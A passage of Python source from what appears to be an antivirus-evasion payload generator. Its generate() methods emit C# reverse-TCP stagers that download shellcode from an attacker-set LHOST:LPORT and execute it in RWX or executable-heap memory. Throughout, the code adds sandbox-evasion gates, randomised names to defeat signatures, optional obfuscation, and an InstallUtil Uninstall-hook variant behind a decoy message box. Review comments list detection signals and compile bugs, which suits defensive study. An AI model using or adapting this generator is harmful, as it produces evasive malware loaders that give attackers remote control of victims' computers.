            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(hThreadName, funcAddrName, threadIdName)
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(hThreadName)

        # Main(): senecas_games() contributes a code prefix and the count of
        # blocks it opened (presumably — helper not visible here); Main's
        # brace is closed inline, the loop below closes the senecas blocks.
        sName = helpers.randomString()
        curlyCount = 0
        payload_code += "static void Main(){\n"

        payload_code2, curlyCount = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2

        # LHOST/LPORT land in a C# string literal unescaped — assumes they
        # contain no '"' or '\'.
        payload_code += "    byte[] %s = null; %s = %s(\"%s\", %s);\n" %(sName, sName, getDataName, self.required_options["LHOST"][0],self.required_options["LPORT"][0])
        payload_code += "    %s(%s); }\n" %(injectName, sName)

        while (curlyCount != 0):
            payload_code += '\t' * curlyCount + '}'
            curlyCount -= 1

        # get 12 random variables for the API imports
        # (`y` holds 17 for the 'heap' declarations; the trailing "}}" in
        # each template closes the class and the namespace)
        r = [helpers.randomString() for x in range(12)]
        y = [helpers.randomString() for x in range(17)]
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap": payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n"""%(y[0],y[1],y[2],y[3],y[4],y[5],y[6],y[7],y[8],y[9],y[10],y[11],y[12],y[13],y[14],y[15],y[16])

        # Optional post-processing of the whole source (arya not visible here).
        if self.required_options["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return
    def generate(self) -> None:
        """Build C# source for a reverse-TCP shellcode stager and store it on self.

        The emitted program connects to LHOST:LPORT, reads a 4-byte length
        prefix, receives that many bytes into a buffer (offset by 5), and hands
        the buffer to an injection routine chosen by INJECT_METHOD:
        "virtual" (VirtualAlloc + CreateThread) or "heap"
        (HeapCreate/HeapAlloc/RtlMoveMemory + CreateThread).  The optional
        EXPIRE_PAYLOAD, HOSTNAME, DOMAIN, PROCESSORS and USERNAME options each
        wrap the stager body in Main with a nested ``if``; ``curlyCount``
        tracks how many of those blocks must be closed afterwards.  Every
        identifier in the generated source comes from helpers.randomString().

        Side effects: sets ``self.payload_source_code``.  When USE_ARYA is
        "y" the source is first passed through ``encryption.arya``.

        NOTE(review): option values (HOSTNAME, USERNAME, LHOST, LPORT,
        EXPIRE_PAYLOAD, PROCESSORS) are interpolated into the C# source
        without any escaping, so a quote, brace or backslash in an option
        yields uncompilable output.  If INJECT_METHOD is neither "virtual"
        nor "heap", no inject function and no DllImport block is emitted, yet
        Main still calls the injector, so that output will not compile either.
        Renaming does not change the kernel32 P/Invoke signatures or the
        Socket/Receive sequence; those are the parts a static detection
        would key on.
        """

        # Names of the two generated C# functions: the socket reader and the
        # injector.
        getDataName = helpers.randomString()
        injectName = helpers.randomString()

        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
        payload_code += "namespace %s { class %s {\n" % (
            helpers.randomString(), helpers.randomString())

        # Local identifiers used inside the generated reader function.
        hostName = helpers.randomString()
        portName = helpers.randomString()
        ipName = helpers.randomString()
        sockName = helpers.randomString()
        length_rawName = helpers.randomString()
        lengthName = helpers.randomString()
        sName = helpers.randomString()
        total_bytesName = helpers.randomString()
        handleName = helpers.randomString()

        payload_code += "static byte[] %s(string %s, int %s) {\n" % (
            getDataName, hostName, portName)
        payload_code += "    IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
            ipName, hostName, portName)
        payload_code += "    Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
            sockName)
        # A failed Connect() makes the reader return null; the injector
        # checks for null before doing anything.
        payload_code += "    try { %s.Connect(%s); }\n" % (sockName, ipName)
        payload_code += "    catch { return null;}\n"
        # The first 4 bytes received are decoded with BitConverter.ToInt32
        # (platform byte order) as the length of what follows.
        payload_code += "    byte[] %s = new byte[4];\n" % (length_rawName)
        payload_code += "    %s.Receive(%s, 4, 0);\n" % (sockName,
                                                         length_rawName)
        payload_code += "    int %s = BitConverter.ToInt32(%s, 0);\n" % (
            lengthName, length_rawName)
        # Buffer is length + 5: the payload is received at offset 5 and the
        # first 5 bytes are filled in below.
        payload_code += "    byte[] %s = new byte[%s + 5];\n" % (sName,
                                                                 lengthName)
        payload_code += "    int %s = 0;\n" % (total_bytesName)
        # Receive loop in chunks of at most 4096 bytes until lengthName bytes
        # have arrived.
        payload_code += "    while (%s < %s)\n" % (total_bytesName, lengthName)
        payload_code += "    { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
            total_bytesName, sockName, sName, total_bytesName, lengthName,
            total_bytesName, lengthName, total_bytesName)
        # Bytes 0..4 become 0xBF followed by the 4-byte socket handle.
        payload_code += "    byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
            handleName, sockName)
        payload_code += "    Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
            handleName, sName, sName)
        payload_code += "    return %s;}\n" % (sName)

        # Local identifiers used inside the generated inject function.
        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            # 0x1000 / 0x40 are MEM_COMMIT / PAGE_EXECUTE_READWRITE; an RWX
            # allocation followed by CreateThread on it is a well-known
            # behavioural detection signal.
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                sName, funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            # 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE and 0x00000008 is
            # HEAP_ZERO_MEMORY: an executable private heap, another
            # recognisable allocation pattern.
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            # Doubled braces here are .format escapes: two '}' are emitted.
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        sName = helpers.randomString()
        randomName = helpers.randomString()  # NOTE(review): never used
        # Number of gate blocks currently open inside Main; each one is
        # closed by the while loop after the stager body.
        curlyCount = 0
        payload_code += "static void Main(){\n"

        if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":

            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()

            # Gate: expire = Today + EXPIRE_PAYLOAD days, body runs only when
            # expire < today (as written).
            payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format(
                RandToday)
            payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format(
                RandExpire, RandToday,
                self.required_options["EXPIRE_PAYLOAD"][0])
            payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format(
                RandExpire, RandToday)

            # Add a tab for this check
            curlyCount += 1

        if self.required_options["HOSTNAME"][0].lower() != "x":

            # Gate: lower-cased MachineName must contain the HOSTNAME value.
            payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(
                self.required_options["HOSTNAME"][0].lower())

            # Add a tab for this check
            curlyCount += 1

        if self.required_options["DOMAIN"][0].lower() != "x":

            # DOMAIN acts only as an on/off flag: its value is not compared.
            # The generated test is MachineName != UserDomainName.  This line
            # is not a .format template, so the single '{' is literal.
            payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'

            # Add a tab for this check
            curlyCount += 1

        if self.required_options["PROCESSORS"][0].lower() != "x":

            # Gate: Environment.ProcessorCount must exceed PROCESSORS.
            payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(
                self.required_options["PROCESSORS"][0])

            # Add a tab for this check
            curlyCount += 1

        if self.required_options["USERNAME"][0].lower() != "x":

            rand_user_name = helpers.randomString()
            rand_char_name = helpers.randomString()

            # Gate: split WindowsIdentity name on '\' and require the second
            # part (index 1) to contain USERNAME.  A name without a backslash
            # would make the generated code throw on [1].
            payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(
                rand_user_name)
            payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format(
                rand_char_name, rand_user_name)
            payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format(
                rand_char_name, self.required_options["USERNAME"][0])

            # Add a tab for this check
            curlyCount += 1

        # Stager body: fetch from LHOST:LPORT, then inject.  The trailing
        # ' }' closes Main itself.
        payload_code += "    byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
            sName, sName, getDataName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0])
        payload_code += "    %s(%s); }\n" % (injectName, sName)

        # Close one brace per gate opened above.
        while (curlyCount != 0):
            payload_code += '\t' * curlyCount + '}'
            curlyCount -= 1

        # Random parameter names for the DllImport declarations: 12 are used
        # by the "virtual" set and 17 by the "heap" set.  Both lists are built
        # unconditionally; the trailing '}}' closes class and namespace.
        r = [helpers.randomString() for x in range(12)]
        y = [helpers.randomString() for x in range(17)]
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])

        # Optional post-processing of the whole source by encryption.arya
        # (its behaviour is not visible here).
        if self.required_options["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return
    def generate(self) -> None:
        """Build C# source for a reverse-TCP stager packaged as an Installer.

        The emitted assembly has three classes: one whose Main only loops
        showing a MessageBox (a decoy; it never reaches the network), an
        ``Installer`` subclass whose ``Uninstall`` override calls the real
        entry method, and a third class holding the kernel32 P/Invoke
        declarations, the socket reader, the injector and that entry method.
        The reader and injector bodies are the same as in the other
        ``generate`` variants (4-byte length prefix, buffer offset by 5,
        INJECT_METHOD "virtual" or "heap").  Environment gates come from
        ``gamemaker.senecas_games(self)``, which also returns how many blocks
        it left open.

        Side effects: sets ``self.payload_source_code``.  No USE_ARYA step
        in this variant.

        NOTE(review): because the working code lives in Installer.Uninstall
        rather than Main, a binary of this shape is run through the
        InstallUtil host; an InstallUtil.exe process opening outbound TCP
        connections is the detection signal to look for.  As in the sibling
        generators, option values are interpolated unescaped and an
        INJECT_METHOD outside {"virtual", "heap"} yields uncompilable output.
        """
        # Random parameter names for the DllImport declarations: 16 generated
        # for the "virtual" set (only r[0..11] are used) and 17 for "heap".
        r = [bypass_helpers.randomString() for x in range(16)]
        y = [bypass_helpers.randomString() for x in range(17)]

        # installutil random class variables
        # NOTE(review): getDataName comes from helpers while every other name
        # here comes from bypass_helpers; presumably both are random-string
        # helpers, but the mix looks accidental.
        getDataName = helpers.randomString()
        className = bypass_helpers.randomString()
        classNameTwo = bypass_helpers.randomString()
        classNameThree = bypass_helpers.randomString()
        execName = bypass_helpers.randomString()
        savedStateName = bypass_helpers.randomString()

        #required syntax at the beginning of any/all payloads
        payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;\n"
        payload_code += "\tpublic class {0} {{\n".format(className)
        payload_code += "\t\tpublic static void Main()\n\t\t{\n"
        # lets add a message box to throw offf sandbox heuristics and analysts :)
        # there is no decryption routine, troll.level = 9000
        # TODO: add a fake decryption function that does nothing and accepts messWithAnalystName as a parameter.
        # This line is not a .format template, so the doubled braces are
        # emitted literally (an extra nested block in the C# output).
        payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n"
        payload_code += "\t\t}\n\t}\n\n"
        # Second class: an Installer whose Uninstall() calls
        # classNameThree.execName() - the real entry point.
        payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n"
        payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format(
            classNameTwo)
        payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format(
            savedStateName)
        payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(
            classNameThree, execName)
        # Third class is left open here; everything below lands inside it.
        payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree)
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            # NOTE(review): unlike the "virtual" branch this template has no
            # trailing newline, so the reader function's signature follows on
            # the same line of C# (legal, but inconsistent).
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])

        # Local identifiers used inside the generated reader function.
        hostName = helpers.randomString()
        portName = helpers.randomString()
        ipName = helpers.randomString()
        sockName = helpers.randomString()
        length_rawName = helpers.randomString()
        lengthName = helpers.randomString()
        sName = helpers.randomString()
        total_bytesName = helpers.randomString()
        handleName = helpers.randomString()

        payload_code += "static byte[] %s(string %s, int %s) {\n" % (
            getDataName, hostName, portName)
        payload_code += "    IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
            ipName, hostName, portName)
        payload_code += "    Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
            sockName)
        # A failed Connect() makes the reader return null; the injector
        # checks for null before doing anything.
        payload_code += "    try { %s.Connect(%s); }\n" % (sockName, ipName)
        payload_code += "    catch { return null;}\n"
        # First 4 bytes received are decoded with BitConverter.ToInt32
        # (platform byte order) as the length of what follows.
        payload_code += "    byte[] %s = new byte[4];\n" % (length_rawName)
        payload_code += "    %s.Receive(%s, 4, 0);\n" % (sockName,
                                                         length_rawName)
        payload_code += "    int %s = BitConverter.ToInt32(%s, 0);\n" % (
            lengthName, length_rawName)
        # Buffer is length + 5: payload goes at offset 5, the first 5 bytes
        # are filled in below.
        payload_code += "    byte[] %s = new byte[%s + 5];\n" % (sName,
                                                                 lengthName)
        payload_code += "    int %s = 0;\n" % (total_bytesName)
        # Receive loop in chunks of at most 4096 bytes.
        payload_code += "    while (%s < %s)\n" % (total_bytesName, lengthName)
        payload_code += "    { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
            total_bytesName, sockName, sName, total_bytesName, lengthName,
            total_bytesName, lengthName, total_bytesName)
        # Bytes 0..4 become 0xBF followed by the 4-byte socket handle.
        payload_code += "    byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
            handleName, sockName)
        payload_code += "    Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
            handleName, sName, sName)
        payload_code += "    return %s;}\n" % (sName)

        # code for the inject() function to inject shellcode
        injectName = bypass_helpers.randomString()
        sName = bypass_helpers.randomString()
        funcAddrName = bypass_helpers.randomString()
        hThreadName = bypass_helpers.randomString()
        threadIdName = bypass_helpers.randomString()
        pinfoName = bypass_helpers.randomString()

        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            # 0x1000 / 0x40 are MEM_COMMIT / PAGE_EXECUTE_READWRITE; an RWX
            # allocation followed by CreateThread on it is a well-known
            # behavioural detection signal.
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                sName, funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            # 0x00040000 is HEAP_CREATE_ENABLE_EXECUTE and 0x00000008 is
            # HEAP_ZERO_MEMORY: an executable private heap.
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            # Doubled braces are .format escapes: two '}' are emitted.
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        sName = bypass_helpers.randomString()
        # Count of braces still open after the entry method body; closed by
        # the while loop at the end.
        num_tabs_required = 0

        # The entry method called from Installer.Uninstall().
        payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
        # senecas_games() is not visible here; it returns extra C# (presumably
        # the environment gates) plus the number of blocks it left open.
        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2
        # +2 presumably accounts for the entry method and the enclosing class,
        # which are still open at this point - TODO confirm.
        num_tabs_required += 2

        # Stager body: fetch from LHOST:LPORT, then inject.  No closing brace
        # on this line; all closing is done by the loop below.
        payload_code += "    byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
            sName, sName, getDataName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0])
        payload_code += "    %s(%s);\n" % (injectName, sName)

        while (num_tabs_required != 0):
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1

        self.payload_source_code = payload_code
        return